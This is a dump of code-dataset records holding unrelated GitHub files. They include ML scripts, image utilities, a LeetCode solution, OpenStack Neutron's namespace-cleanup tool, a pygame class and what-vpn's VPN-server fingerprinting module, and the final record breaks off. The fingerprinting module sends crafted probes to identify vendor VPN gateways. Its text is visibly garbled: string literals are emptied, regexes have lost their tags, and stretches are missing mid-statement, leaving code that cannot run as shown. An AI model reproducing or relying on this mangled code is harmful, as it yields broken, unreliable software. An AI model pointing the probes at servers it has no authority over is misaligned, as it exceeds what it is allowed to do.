:, :], (-1, 784)) + noise\n\n train_data_tmp = np.append(np.reshape(x_train[data_shift:n_orig+data_shift], newshape=(-1, 784)),\n additional_x_train[:n_t-n_orig], axis=0)\n train_labels_tmp = np.append(y_train[data_shift:n_orig+data_shift],\n additional_y_train[:n_t-n_orig], axis=0)\n\n train_data = []\n train_labels = 
[]\n\n f_n = 0\n\n # validation\n for j in range(n_t//batch_size+1):\n if (j+1)*batch_size <= n_t:\n x_batch = train_data_tmp[j*batch_size:(j+1)*batch_size]\n y_batch = train_labels_tmp[j*batch_size:(j+1)*batch_size]\n else:\n x_batch = np.append(train_data_tmp[j*batch_size:], np.zeros(((j+1)*batch_size-n_t, 784)), axis=0)\n y_batch = np.append(train_labels_tmp[j*batch_size:], [[0., 1.]]*((j+1)*batch_size-n_t), axis=0)\n\n # calculate statistics values\n stat_vals = sess.run(d_x, feed_dict={\n x_placeholder: np.reshape(x_batch, newshape=[batch_size, im_dim, im_dim, channel]),\n y_placeholder: y_batch})\n for k in range(batch_size):\n if k+j*batch_size < n_t:\n was_generated = (k+j*batch_size >= int(n_t*(1-gen_share)))\n validation_success = stat_vals[k, 0] > validation_crit_val or skip_validation\n if validation_success:\n train_data.append(np.reshape(x_batch[k], newshape=784))\n train_labels.append(1. if y_batch[k, 0] == 1. else -1.)\n\n if validation_success and was_generated:\n f_n += 1\n\n false_neg.append(f_n)\n svc = svm.LinearSVC(loss='hinge').fit(train_data, train_labels)\n errs.append(1 - svc.score(x_test, y_test))\n\n# show noisy images\nfig = plt.figure(figsize=(2, 2))\ncolumns = 2\nrows = 2\nfor i in range(1, columns*rows + 1):\n img = np.reshape(additional_x_train[-i-1], newshape=(28, 28))\n fig.add_subplot(rows, columns, i)\n plt.imshow(img, cmap='gray_r')\nplt.show()\n\nprint('error=', np.mean(errs)*100, '+-', (np.std(errs)*1.96/np.sqrt(n_trials))*100)\n\nif not skip_validation:\n print('false negative=', (np.mean(false_neg)/int(n_t*gen_share))*100,\n '+-', (np.std(false_neg)*100/int(n_t*gen_share))*1.96/np.sqrt(n_trials))\n print('false positive=', false_pos / n_orig*100)\n\n","repo_name":"iindyk/my_GAN","sub_path":"tf_version_mnist/random_noise_detection.py","file_name":"random_noise_detection.py","file_ext":"py","file_size_in_byte":6409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41305987462","text":"\"\"\"\n • On the first line, you will receive the number (an integer)\n • On the second line, you will receive a number, which is the logarithm base.\n It can be either a number or the word \"natural\"\nThe output should be formatted to the 2nd decimal digit\n\"\"\"\n\nfrom math import log\n\nx = int(input(\"enter argument:\\n\"))\nbase = input(\"select the base, 'natural' or a number:\\n\")\nif base.lstrip('-').isnumeric():\n exponent = log(x, int(base))\nelse:\n exponent = log(x)\nprint(f\"{exponent: .2f}\")\n","repo_name":"h-dmt/Python_Advanced","sub_path":"8_modules/calculate_logarithm.py","file_name":"calculate_logarithm.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39615120899","text":"from __future__ import division\nimport numpy as np\nimport cv2\n\n\ndef load_test_data(image_path, fine_size=512):\n img = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (fine_size, fine_size), interpolation=cv2.INTER_AREA)\n img = np.array(img).reshape([fine_size, fine_size, 1]) / 127.5 -1\n return img\n\n\ndef load_train_data(image_path, options):\n img_A = cv2.imread(image_path[0], cv2.IMREAD_GRAYSCALE)\n img_B = cv2.imread(image_path[1], cv2.IMREAD_COLOR)\n img_B = img_B[:, :, ::-1] # OpenCV read images in BGR order\n label_B = target_rgb2label(img_B, options.label_colors) # label map\n\n is_cropping = True if np.random.random() > 0.8 else False\n if not is_cropping:\n img_A = 
cv2.resize(img_A, (options.load_size, options.load_size), interpolation=cv2.INTER_AREA)\n label_B = cv2.resize(label_B, (options.load_size, options.load_size), interpolation=cv2.INTER_NEAREST)\n h1 = int(np.ceil(np.random.uniform(1e-2, options.load_size - options.image_size)))\n w1 = int(np.ceil(np.random.uniform(1e-2, options.load_size - options.image_size)))\n img_A = img_A[h1:h1 + options.image_size, w1:w1 + options.image_size]\n label_B = label_B[h1:h1 + options.image_size, w1:w1 + options.image_size]\n else:\n img_A = cv2.resize(img_A, (options.image_size, options.image_size), interpolation=cv2.INTER_AREA)\n label_B = cv2.resize(label_B, (options.image_size, options.image_size), interpolation=cv2.INTER_NEAREST)\n\n # img_A: (fine_size, fine_size) >> np_A: (fine_size, fine_size, 1)\n np_A = np.array(img_A) / 127.5 -1\n np_A = np_A.reshape([options.image_size, options.image_size, 1])\n\n # label_B: (fine_size,fine_size) >> np_B: (fine_size, fine_size, output_nc)\n np_B = np.zeros([options.image_size, options.image_size, options.output_nc], dtype=np.float32)\n for it in range(options.output_nc):\n rr, cc = np.where(label_B == it)\n np_B[rr, cc, it] = 1\n\n # img_AB shape: (fine_size, fine_size, input_c_dim + output_c_dim )\n return np.concatenate((np_A, np_B), axis=2)\n\n\ndef save_pred(logits, image_path, label_colors):\n logit = logits[0] if len(logits.shape) == 4 else logits\n pred_label = np.argmax(logit, axis=-1)\n img = target_label2rgb(pred_label, label_colors)\n return cv2.imwrite(image_path, img[:, :, ::-1])\n\n\ndef target_rgb2label(target_img, label_colors):\n width, height, _ = target_img.shape\n target_label = np.zeros([width, height], dtype=np.uint8)\n for it in range(1, len(label_colors)):\n rr, cc = np.where(np.all(target_img == label_colors[it], axis=-1))\n target_label[rr, cc] = it\n return target_label\n\n\ndef target_label2rgb(target_np, label_colors):\n width, height = target_np.shape\n target_img = np.zeros([width, height, 3], dtype=np.uint8)\n target_img[:] = label_colors[0] # background\n for it in range(np.max(target_np)):\n rr, cc = np.where(target_np == it+1)\n target_img[rr, cc, :] = label_colors[it+1]\n return target_img\n\n# grid\ndef load_train_patch(image_path, options):\n img_A = cv2.imread(image_path[0], cv2.IMREAD_GRAYSCALE)\n img_B = cv2.imread(image_path[1], cv2.IMREAD_COLOR)\n img_B = img_B[:, :, ::-1] # OpenCV read images in BGR order\n label_B = target_rgb2label(img_B, options.label_colors) # label map\n\n # scale_ratio\n img_A = cv2.resize(img_A, (0,0), fx=options.scale, fy=options.scale, interpolation=cv2.INTER_AREA)\n label_B = cv2.resize(label_B, (0,0), fx=options.scale, fy=options.scale, interpolation=cv2.INTER_NEAREST)\n\n height, width = img_A.shape[0:2]\n if height < options.image_size:\n pad_h = options.image_size-height\n img_A = np.vstack((img_A, 255 * np.ones((pad_h, width))))\n height, width = img_A.shape[0:2]\n if width < options.image_size:\n pad_w = options.image_size - width\n img_A = np.hstack((img_A, 255 * np.ones((height, pad_w))))\n\n # patch\n height, width = img_A.shape[0:2]\n crop_name, crop_img, crop_label, crop_white = [], [], [], []\n overlapping = min((1 - 1 / options.image_size), options.overlapping)\n w_num = int(width / options.image_size / (1-overlapping))\n h_num = int(height / options.image_size / (1-overlapping))\n\n np_A = np.array(img_A).reshape([height, width, 1])\n np_B = np.zeros([height, width, options.output_nc], dtype=np.float32)\n for it in range(options.output_nc):\n rr, cc = np.where(label_B == it)\n 
np_B[rr, cc, it] = 1\n\n for (h, w) in [(h_, w_) for h_ in range(h_num) for w_ in range(w_num)]:\n h1 = int(h / (h_num - 1) * (height - options.image_size)) if not h_num == 1 else 0\n w1 = int(w / (w_num - 1) * (width - options.image_size)) if not w_num == 1 else 0\n cur_img = np_A[h1:h1 + options.image_size, w1:w1 + options.image_size, :]\n cur_label = np_B[h1:h1 + options.image_size, w1:w1 + options.image_size, :]\n is_white = True if (np.sum(cur_img > 245) / options.image_size ** 2) > 0.98 else False # threshold = 0.95\n\n cur_img = cur_img / 127.5 - 1\n crop_name.append((w, h))\n crop_img.append(cur_img)\n crop_label.append(cur_label)\n crop_white.append(is_white)\n\n return np.array(crop_name), np.array(crop_img), np.array(crop_label), np.array(crop_white)","repo_name":"syoi92/Archive_FPNetSNU","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"40438465339","text":"# -*- coding: utf-8 -*-\n# @Author: Lich_Amnesia\n# @Email: alwaysxiaop@gmail.com\n# @Date: 2016-10-25 12:26:20\n# @Last Modified time: 2016-10-25 12:28:05\n# @FileName: 301.py\n\n\nclass Solution(object):\n\n def removeInvalidParentheses(self, s):\n \"\"\"\n :type s: str\n :rtype: List[str]\n \"\"\"\n\n def dfs(s):\n m = calc(s)\n if m == 0:\n return [s]\n ans = []\n for i in range(len(s)):\n if s[i] in ('(', ')'):\n new_s = s[:i] + s[i + 1:]\n if new_s not in vis and calc(new_s) < m:\n vis.add(new_s)\n ans.extend(dfs(new_s))\n return ans\n\n def calc(s):\n a, b = 0, 0\n for c in s:\n a += {'(': 1, ')': -1}.get(c, 0)\n b += a < 0\n a = max(a, 0)\n return a + b\n\n vis = set([s])\n return dfs(s)\n","repo_name":"LichAmnesia/LeetCode","sub_path":"python/301.py","file_name":"301.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8670221701","text":"import itertools\nimport re\nimport signal\nimport time\n\nfrom neutron_lib import constants\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nfrom oslo_utils import importutils\n\nfrom neutron.agent.common import ovs_lib\nfrom neutron.agent.l3 import dvr_fip_ns\nfrom neutron.agent.l3 import dvr_snat_ns\nfrom neutron.agent.l3 import namespaces\nfrom neutron.agent.linux import dhcp\nfrom neutron.agent.linux import external_process\nfrom neutron.agent.linux import ip_lib\nfrom neutron.agent.linux import utils\nfrom neutron.common import config\nfrom neutron.conf.agent import cmd\nfrom neutron.conf.agent import common as agent_config\nfrom neutron.conf.agent import dhcp as dhcp_config\nfrom neutron.privileged.agent.linux import utils as priv_utils\n\nLOG = logging.getLogger(__name__)\nNS_PREFIXES = {\n 'dhcp': [dhcp.NS_PREFIX],\n 'l3': [namespaces.NS_PREFIX, dvr_snat_ns.SNAT_NS_PREFIX,\n dvr_fip_ns.FIP_NS_PREFIX],\n}\nSIGTERM_WAITTIME = 10\n\n\nclass PidsInNamespaceException(Exception):\n pass\n\n\nclass FakeDhcpPlugin(object):\n \"\"\"Fake RPC plugin to bypass any RPC calls.\"\"\"\n def __getattribute__(self, name):\n def fake_method(*args):\n pass\n return fake_method\n\n\ndef setup_conf():\n \"\"\"Setup the cfg for the clean up utility.\n\n Use separate setup_conf for the utility because there are many options\n from the main config that do not apply during clean-up.\n \"\"\"\n\n conf = cfg.CONF\n config.register_common_config_options()\n cmd.register_cmd_opts(cmd.netns_opts, conf)\n 
agent_config.register_interface_driver_opts_helper(conf)\n dhcp_config.register_agent_dhcp_opts(conf)\n agent_config.register_interface_opts()\n return conf\n\n\ndef _get_dhcp_process_monitor(config):\n return external_process.ProcessMonitor(config=config,\n resource_type='dhcp')\n\n\ndef kill_dhcp(conf, namespace):\n \"\"\"Disable DHCP for a network if DHCP is still active.\"\"\"\n network_id = namespace.replace(dhcp.NS_PREFIX, '')\n\n dhcp_driver = importutils.import_object(\n conf.dhcp_driver,\n conf=conf,\n process_monitor=_get_dhcp_process_monitor(conf),\n network=dhcp.NetModel({'id': network_id}),\n plugin=FakeDhcpPlugin())\n\n if dhcp_driver.active:\n dhcp_driver.disable()\n\n\ndef eligible_for_deletion(conf, namespace, force=False):\n \"\"\"Determine whether a namespace is eligible for deletion.\n\n Eligibility is determined by having only the lo device or if force\n is passed as a parameter.\n \"\"\"\n\n if conf.agent_type:\n prefixes = NS_PREFIXES.get(conf.agent_type)\n else:\n prefixes = itertools.chain(*NS_PREFIXES.values())\n ns_mangling_pattern = '(%s%s)' % ('|'.join(prefixes),\n constants.UUID_PATTERN)\n\n # filter out namespaces without UUID as the name\n if not re.match(ns_mangling_pattern, namespace):\n return False\n\n ip = ip_lib.IPWrapper(namespace=namespace)\n return force or ip.namespace_is_empty()\n\n\ndef unplug_device(device):\n orig_log_fail_as_error = device.get_log_fail_as_error()\n device.set_log_fail_as_error(False)\n try:\n device.link.delete()\n except RuntimeError:\n device.set_log_fail_as_error(orig_log_fail_as_error)\n # Maybe the device is OVS port, so try to delete\n ovs = ovs_lib.BaseOVS()\n bridge_name = ovs.get_bridge_for_iface(device.name)\n if bridge_name:\n bridge = ovs_lib.OVSBridge(bridge_name)\n bridge.delete_port(device.name)\n else:\n LOG.debug('Unable to find bridge for device: %s', device.name)\n finally:\n device.set_log_fail_as_error(orig_log_fail_as_error)\n\n\ndef wait_until_no_listen_pids_namespace(namespace, timeout=SIGTERM_WAITTIME):\n \"\"\"Poll listening processes within the given namespace.\n\n If after timeout seconds, there are remaining processes in the namespace,\n then a PidsInNamespaceException will be thrown.\n \"\"\"\n # NOTE(dalvarez): This function can block forever if\n # find_listen_pids_in_namespace never returns which is really unlikely. We\n # can't use wait_until_true because we might get interrupted by eventlet\n # Timeout during our I/O with rootwrap daemon and that will lead to errors\n # in subsequent calls to utils.execute grabbing always the output of the\n # previous command\n start = end = time.time()\n while end - start < timeout:\n if not priv_utils.find_listen_pids_namespace(namespace):\n return\n time.sleep(1)\n end = time.time()\n raise PidsInNamespaceException\n\n\ndef _kill_listen_processes(namespace, force=False):\n \"\"\"Identify all listening processes within the given namespace.\n\n Then, for each one, find its top parent with same cmdline (in case this\n process forked) and issue a SIGTERM to all of them. If force is True,\n then a SIGKILL will be issued to all parents and all their children. 
Also,\n this function returns the number of listening processes.\n \"\"\"\n pids = priv_utils.find_listen_pids_namespace(namespace)\n pids_to_kill = {utils.find_fork_top_parent(pid) for pid in pids}\n kill_signal = signal.SIGTERM\n if force:\n kill_signal = signal.SIGKILL\n children = [utils.find_child_pids(pid, True) for pid in pids_to_kill]\n pids_to_kill.update(itertools.chain.from_iterable(children))\n\n for pid in pids_to_kill:\n # Throw a warning since this particular cleanup may need a specific\n # implementation in the right module. Ideally, netns_cleanup wouldn't\n # kill any processes as the responsible module should've killed them\n # before cleaning up the namespace\n LOG.warning(\"Killing (%(signal)d) [%(pid)s] %(cmdline)s\",\n {'signal': kill_signal,\n 'pid': pid,\n 'cmdline': ' '.join(utils.get_cmdline_from_pid(pid))[:80]\n })\n try:\n utils.kill_process(pid, kill_signal, run_as_root=True)\n except Exception as ex:\n LOG.error('An error occurred while killing '\n '[%(pid)s]: %(msg)s', {'pid': pid, 'msg': ex})\n return len(pids)\n\n\ndef kill_listen_processes(namespace):\n \"\"\"Kill all processes listening within the given namespace.\n\n First it tries to kill them using SIGTERM, waits until they die gracefully\n and then kills remaining processes (if any) with SIGKILL\n \"\"\"\n if _kill_listen_processes(namespace, force=False):\n try:\n wait_until_no_listen_pids_namespace(namespace)\n except PidsInNamespaceException:\n _kill_listen_processes(namespace, force=True)\n # Allow some time for remaining processes to die\n wait_until_no_listen_pids_namespace(namespace)\n\n\ndef destroy_namespace(conf, namespace, force=False):\n \"\"\"Destroy a given namespace.\n\n If force is True, then dhcp (if it exists) will be disabled and all\n devices will be forcibly removed.\n \"\"\"\n\n try:\n ip = ip_lib.IPWrapper(namespace=namespace)\n\n if force:\n kill_dhcp(conf, namespace)\n # NOTE: The dhcp driver will remove the namespace if is it empty,\n # so a second check is required here.\n if ip.netns.exists(namespace):\n try:\n kill_listen_processes(namespace)\n except PidsInNamespaceException:\n # This is unlikely since, at this point, we have SIGKILLed\n # all remaining processes but if there are still some, log\n # the error and continue with the cleanup\n LOG.error('Not all processes were killed in %s',\n namespace)\n for device in ip.get_devices():\n unplug_device(device)\n\n ip.garbage_collect_namespace()\n except Exception:\n LOG.exception('Error unable to destroy namespace: %s', namespace)\n\n\ndef cleanup_network_namespaces(conf):\n # Identify namespaces that are candidates for deletion.\n candidates = [ns for ns in\n ip_lib.list_network_namespaces()\n if eligible_for_deletion(conf, ns, conf.force)]\n\n if candidates:\n time.sleep(2)\n\n for namespace in candidates:\n destroy_namespace(conf, namespace, conf.force)\n\n\ndef main():\n \"\"\"Main method for cleaning up network namespaces.\n\n This method will make two passes checking for namespaces to delete. The\n process will identify candidates, sleep, and call garbage collect. The\n garbage collection will re-verify that the namespace meets the criteria for\n deletion (ie it is empty). 
The period of sleep and the 2nd pass allow\n    time for the namespace state to settle, so that the check prior to deletion\n    will re-confirm the namespace is empty.\n\n    The utility is designed to clean-up after the forced or unexpected\n    termination of Neutron agents.\n\n    The --force flag should only be used as part of the cleanup of a devstack\n    installation as it will blindly purge namespaces and their devices. This\n    option also kills any lingering DHCP instances.\n    \"\"\"\n    conf = setup_conf()\n    conf()\n    config.setup_logging()\n    agent_config.setup_privsep()\n    cleanup_network_namespaces(conf)\n","repo_name":"openstack/neutron","sub_path":"neutron/cmd/netns_cleanup.py","file_name":"netns_cleanup.py","file_ext":"py","file_size_in_byte":9308,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"1362495071","text":"import pygame\nfrom modules.states.main_menu import *\nfrom modules.states.game_mode_menu import *\nfrom modules.states.levels.test_level import *\n\nclass Game:\n\tdef __init__(self, display):\n\t\tself.display_surface = pygame.display.get_surface()\n\n\t\tpygame.font.init()\n\n\t\tself.display = display # Display.py instance.\n\n\t\tself.delta_time = 0\n\n\t\tself.current_state = MainMenu(self)\n\n\t\tself.states = {\n\t\t\t\"MainMenu\" : MainMenu,\n\t\t\t\"GameModeMenu\" : GameModeMenu,\n\t\t\t\n\t\t\t\"TestLevel\" : TestLevel\n\t\t}\n\n\t\tself.state = \"MainMenu\"\n\n\tdef update(self, dt):\n\t\tself.delta_time = dt\n\n\t\tself.current_state.update(self.delta_time)\n\n\tdef change_state(self, state): # Change the state and init the state\n\t\tself.state = state\n\t\tdel self.current_state\n\t\tself.current_state = self.states[self.state](self)\n","repo_name":"Acaippa/pygame-lawnmower","sub_path":"ver 0.3/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40749520705","text":"import cv2\nimport numpy as np\nfrom keras.models import load_model\n\n\n# Classify fresh/rotten\ndef print_fresh(res):\n    threshold_fresh = 0.10 # set according to standards\n    threshold_medium = 0.35 # set according to standards\n    if res < threshold_fresh:\n        print(\"The item is FRESH!\")\n    elif threshold_fresh < res < threshold_medium:\n        print(\"The item is MEDIUM FRESH\")\n    else:\n        print(\"The item is NOT FRESH\")\n\n\ndef pre_proc_img(image_path):\n    # Read the image using OpenCV\n    img = cv2.imread(image_path)\n    img = cv2.resize(img, (100, 100))\n    img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n    # Preprocess the image\n    img = img / 255.0\n    img = np.expand_dims(img, axis=0)\n    return img\n\n\ndef evaluate_rotten_vs_fresh(image_path):\n    # Load the trained model\n    model = load_model('trained-freshness-model.h5')\n\n    # Read and process and predict\n    prediction = model.predict(pre_proc_img(image_path))\n\n    return prediction[0][0]\n\n\n# Example usage:\nimg_path = 'image-to-eval.png'\nis_rotten = evaluate_rotten_vs_fresh(img_path)\nprint(f'Prediction: {is_rotten}')\nprint_fresh(is_rotten)\n","repo_name":"captraj/fruit-veg-freshness-ai","sub_path":"evaluate-image.py","file_name":"evaluate-image.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16832580154","text":"import yaml\n\n\nclass ADNetConf:\n    conf = None\n\n    @staticmethod\n    def get(cfg=None):\n        if cfg is not None:\n            ADNetConf.conf = ADNetConf(cfg)\n        return 
ADNetConf.conf\n\n @staticmethod\n def g():\n return ADNetConf.get()\n\n def __init__(self, path):\n if path:\n with open(path, 'r') as fp:\n self.conf = yaml.load(fp, Loader=yaml.FullLoader)\n\n def __getitem__(self, key):\n return self.conf[key]\n \nif __name__ == '__main__':\n ADNetConf.get('dylan.yaml')\n print(ADNetConf.get()['dl_paras']['zoom_scale'])\n print(ADNetConf.conf.__dict__)\n\n","repo_name":"dinglijay/ImitateTracking","sub_path":"conf/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10749664145","text":"from contextlib import closing\nfrom urllib.parse import urlsplit, parse_qs\nfrom requests import exceptions as rex\nimport re\nimport attr\nimport ssl\nimport socket\ntry:\n import dtls\n dtls.do_patch()\nexcept ImportError:\n dtls = None\n\n\n@attr.s\nclass Hit(object):\n def __bool__(self):\n return self.confidence > 0.0\n\n def __str__(self):\n return self.name + (' ({})'.format(self.details) if self.details else '')\n\n @property\n def details(self):\n strings = []\n if self.version:\n strings.append(self.version)\n if self.components:\n strings.append('+'.join(self.components))\n if self.confidence < 1.0:\n strings.append('%d%%' % (self.confidence * 100))\n return ', '.join(strings)\n\n name = attr.ib()\n confidence = attr.ib(default=1.0, validator=attr.validators.instance_of(float))\n version = attr.ib(default=None)\n components = attr.ib(default=None)\n\n\ndef _meaningless(x, *vals):\n if x not in vals:\n return x\n\n\n\ndef server_split(host_and_maybe_port):\n rest, *last = host_and_maybe_port.rsplit(':', 1)\n if not last:\n host, port = rest, 443\n elif ']' in last: # we mis-split an IPv6 address, something like '[2601::1234]':\n host, port = host_and_maybe_port, 443\n else:\n host, port = rest, int(last[0])\n return host, port\n\n\n#####\n# Sniffers based on protocol details\n#####\n\ndef global_protect(sess, server):\n '''PAN GlobalProtect'''\n # with closing(sess.get('https://{}/ssl-tunnel-connect.sslvpn'.format(server), stream=True)) as r:\n # if r.status_code==502:\n # components.append('gateway')\n\n components = []\n version = confidence = None\n\n for component, path in (('portal', 'global-protect'), ('gateway', 'ssl-vpn')):\n r = sess.post('https://{}/{}/prelogin.esp?tmp=tmp&clientVer=4100&clientos=Windows'.format(server, path),\n headers={'user-agent': 'PAN GlobalProtect'})\n if r.headers.get('content-type', '').startswith('application/xml') and b'' in r.content:\n confidence = 1.0\n\n if b'Success' in r.content:\n components.append(component)\n if 'gateway' in components:\n # Gateway servers return '502 Bad Gateway' when they don't like the user/authcookie parameters\n # for the SSL tunnel. 
It's theoretically possible, but I've literally never seen a gateway server\n # that doesn't use the standard SSL tunnel path.\n with closing(sess.get('https://{}/ssl-tunnel-connect.sslvpn?user=&authcookie='.format(server))) as r:\n if r.status_code != 502:\n confidence = 0.8\n elif b'Error' in r.content and b'Valid client certificate is required' in r.content:\n components.append(component)\n components.append(component + ' wants ccert')\n\n m = re.search(rb'([^<]+)', r.content)\n if m:\n saml = '%s wants SAML %s' % (component, m.group(1).decode())\n components.append(saml)\n\n m = re.search(rb'([^<]+)', r.content)\n if m:\n version = m.group(1).decode()\n\n if confidence:\n return Hit(name='PAN GlobalProtect', components=components, version=_meaningless(version, '1'), confidence=confidence)\n\n\ndef check_point(sess, server):\n '''Check Point'''\n confidence = protocols = None\n\n # ClientHello HTTP request in Check Point's parenthesis-heavy format\n r = sess.post('https://{}/clients'.format(server),\n data=b'(CCCclientRequest\\n:RequestHeader (\\n:id (1)\\n:session_id ()\\n:type (ClientHello)\\n:protocol_version (100)\\n)\\n:RequestData (\\n:client_info (\\n:client_type (TRAC)\\n:client_version (0)\\n)\\n)\\n)\\n')\n if r.content.startswith(b'(CCCserverResponse'):\n confidence = 1.0\n protocols = re.search(rb':supported_data_tunnel_protocols\\s*\\(((?:\\s*:\\s*\\([^\\)]+\\))*\\s*\\))', r.content, re.M)\n if protocols:\n protocols = [b.decode() for b in re.findall(rb'\\(([^\\)]+)\\)', protocols.group(1))]\n\n # ClientHello request over bare TLS in Check Point's format\n if not confidence:\n sock = socket.socket(socket.AF_INET)\n sock.settimeout(sess.timeout)\n context = ssl._create_unverified_context()\n conn = context.wrap_socket(sock)\n\n client_hello = b'(client_hello\\n:client_version (1)\\n:protocol_version (1)\\n:OM (\\n:ipaddr (0.0.0.0)\\n:keep_address (false)\\n)\\n:optional (\\n:client_type (4)\\n)\\n:cookie (ff)\\n)\\n'\n client_hello = bytes((0, 0, 0, len(client_hello), 0, 0, 0, 1)) + client_hello # Add length and packet-type prefix\n with closing(conn):\n conn.connect(server_split(server))\n conn.write(client_hello)\n resp = conn.recv(19)\n if resp[4:19] == b'\\0\\0\\0\\x01(disconnect':\n confidence = 1.0\n protocols = ('SSL',)\n\n return confidence and Hit(name='Check Point', confidence=confidence, components=protocols)\n\n\ndef sstp(sess, server):\n '''SSTP'''\n # Yes, this is for real...\n # See section 3.2.4.1 of v17.0 doc at https://msdn.microsoft.com/en-us/library/cc247338.aspx\n\n with closing(sess.request('SSTP_DUPLEX_POST', 'https://{}/sra_%7BBA195980-CD49-458b-9E23-C84EE0ADCD75%7D/'.format(server), stream=True)) as r:\n if r.status_code == 200 and r.headers.get('content-length') == '18446744073709551615':\n version = _meaningless(r.headers.get('server'), \"Microsoft-HTTPAPI/2.0\")\n return Hit(name='SSTP', version=version)\n\n\ndef anyconnect(sess, server):\n '''AnyConnect/OpenConnect'''\n\n platform = 'win'\n config_payload = (\n '\\n'\n ''\n '{}'\n 'https://{}'.format(platform, server))\n\n components = []\n xml_post_ok = None\n\n # Use XML-post auth to check for client cert requirement\n # (This may actually vary by auth-group, but we don't try to enumerate the auth-groups)\n try:\n r = sess.post('https://{}/'.format(server), data=config_payload, headers={\n 'X-Aggregate-Auth': '1', 'X-Transcend-Version': '1'})\n if b'v6.2?'\n elif r.status_code == 302 and re.search(r'/remote/login', r.headers.get('location', '')):\n # Older FortiGate versions (we think) respond 
to invalid/expired SVPNCOOKIE thusly\n confidence = 1.0\n version = ((version + '; ') if version else '') + 'FortiGate >8, len(client_hello) & 0xff)) + client_hello # Add length prefix (be16)\n with closing(conn):\n conn.connect(server_split(server))\n conn.write(client_hello)\n resp = conn.recv()\n if resp[0] == (len(resp)>>8) and resp[1] == (len(resp)&0xff) and resp[2:9] == b'GFtype\\0':\n confidence = 1.0\n dtls = True\n\n return Hit(name='Fortinet', confidence=confidence, version=version, components=(['DTLS'] if dtls else None))\n\n\ndef sonicwall_nx(sess, server):\n '''SonicWall NX (formerly Dell)'''\n\n sess.cookies.set(domain=server, name='EXTRAWEB_REFERER', value='/preauthMI/microinterrogator.js')\n with closing(sess.get('https://{}/sslvpnclient?launchplatform=mac&neProto=3&supportipv6=yes'.format(server), stream=True,\n headers={\"X-SSLVPN-PROTOCOL\": \"2.0\", \"X-SSLVPN-SERVICE\": \"NETEXTENDER\", \"X-NE-PROTOCOL\": \"2.0\"})) as r:\n if 'EXTRAWEB_STATE' in sess.cookies and 400 <= r.status_code < 500:\n server = r.headers.get('server')\n return Hit(name='SonixWall NX', confidence=0.8, version=server)\n\n\ndef aruba_via(sess, server):\n '''Aruba VIA'''\n\n # server sets *empty* SESSION cookie and returns 401 invalid\n r = sess.get('https://{}'.format(server))\n if r.status_code == 401 and r.headers.get('set-cookie', '').startswith('SESSION'):\n confidence = 0.5 if 'Aruba Networks' in r.text else 0.3\n r = sess.get('https://{}/screens/wms/wms.login'.format(server))\n if r.status_code == 200 and r.headers.get('set-cookie', '').startswith('SESSION'):\n confidence += 0.3\n\n return Hit(name='Aruba VIA', confidence=confidence)\n\n\ndef h3c(sess, server):\n '''H3C TLS VPN'''\n r = sess.get('https://{}/svpn/index.cgi'.format(server), headers={'user-agent': 'SSLVPN-Client/3.0'})\n if '' in r.text:\n # HTML/XML page containing server information, including auth methods\n server = r.headers.get('server')\n return Hit(name='H3C', confidence=0.9 if server == 'SSLVPN-Gateway/7.0' else 0.8,\n version=_meaningless(server, 'SSLVPN-Gateway/7.0'))\n\n\ndef huawei(sess, server):\n '''Huawei SSL VPN'''\n r = sess.post('https://{}/login.html'.format(server), data={'UserName': '', 'Password': ''}, allow_redirects=False)\n final_url = urlsplit(r.headers.get('location', ''))\n if final_url.path.split('/')[-1] == 'relogin.html':\n # Server sends a bizarrely-formatted set-cookie header like 'Set-Cookie: UserID=0&SVN_SessionID='\n # HTTP cookie names aren't supposed to contain ampersands like this.\n bizarre_cookie = r.headers.get('set-cookie', '').startswith('UserID=') and '&' in r.headers.get('set-cookie', '')\n return Hit(name='Huawei',\n confidence = 0.4 + (0.2 if parse_qs(final_url.query).get('ReloginCause') else 0) + (0.4 if bizarre_cookie else 0))\n\n\nsniffers = [\n anyconnect,\n juniper_pulse,\n juniper_secure_connect,\n global_protect,\n barracuda,\n check_point,\n sstp,\n openvpn,\n fortinet,\n array_networks,\n f5_bigip,\n sonicwall_nx,\n aruba_via,\n h3c,\n huawei,\n]\n","repo_name":"dlenski/what-vpn","sub_path":"what_vpn/sniffers.py","file_name":"sniffers.py","file_ext":"py","file_size_in_byte":17324,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"72"} +{"seq_id":"27660099070","text":"# гипотенуза\n\nimport math\nCAT_A = 16\nCAT_B = 12\nGIP = (CAT_A ** 2) + (CAT_B ** 2)\nprint(math.sqrt(GIP))\n# площадь\n\nS = (CAT_A * CAT_B) / 
